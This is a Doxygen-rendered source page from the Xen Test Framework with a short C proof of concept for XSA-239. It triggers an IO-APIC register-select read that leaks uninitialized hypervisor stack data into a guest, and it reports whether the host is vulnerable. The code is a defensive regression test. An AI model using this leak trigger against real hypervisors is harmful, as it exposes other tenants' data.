Xen Test Framework
main.c
Go to the documentation of this file.
1 
18 #include <xtf.h>
19 
20 const char test_title[] = "XSA-239 PoC";
21 
22 void test_main(void)
23 {
24  uint32_t *io_apic_32 = _p(IOAPIC_DEFAULT_BASE);
25  uint8_t *io_apic_8 = _p(IOAPIC_DEFAULT_BASE);
26  unsigned int i;
27 
28  /*
29  * Retry several times. It is plausible that the stack rubble happens to
30  * be zeroes.
31  */
32  for ( i = 0; i < 20; ++i )
33  {
34  ACCESS_ONCE(io_apic_8[0]) = 0;
35 
36  uint32_t val = ACCESS_ONCE(io_apic_32[0]);
37 
38  /*
39  * Cope with an IOAPIC not being present, and the IO being terminated
40  * as ~0u by the default no-op handler.
41  */
42  if ( val != 0 && val != ~0u )
43  {
44  printk("Data leaked via IO_APIC REG_SELECT: %08x\n", val);
45  return xtf_failure("Fail: Vulnerable to XSA-239\n");
46  }
47 
48  hypercall_yield();
49  }
50 
51  xtf_success("Success: Probably not vulnerable to XSA-239\n");
52 }
53 
54 /*
55  * Local variables:
56  * mode: C
57  * c-file-style: "BSD"
58  * c-basic-offset: 4
59  * tab-width: 4
60  * indent-tabs-mode: nil
61  * End:
62  */
printk
void printk(const char *fmt,...)
Definition: console.c:134
hypercall_yield
static void hypercall_yield(void)
Definition: hypercall.h:206
IOAPIC_DEFAULT_BASE
#define IOAPIC_DEFAULT_BASE
Definition: io-apic.h:29
xtf_success
void xtf_success(const char *fmt,...)
Report test success.
Definition: report.c:38
xtf_failure
void xtf_failure(const char *fmt,...)
Report a test failure.
Definition: report.c:94
test_main
void test_main(void)
To be implemented by each test, as its entry point.
Definition: main.c:137
uint32_t
__UINT32_TYPE__ uint32_t
Definition: stdint.h:16
test_title
const char test_title[]
The title of the test.
Definition: main.c:14
_p
#define _p(v)
Express an abitrary integer v as void *.
Definition: numbers.h:48
uint8_t
__UINT8_TYPE__ uint8_t
Definition: stdint.h:14
ACCESS_ONCE
#define ACCESS_ONCE(x)
Definition: lib.h:10
Generated by   doxygen 1.8.13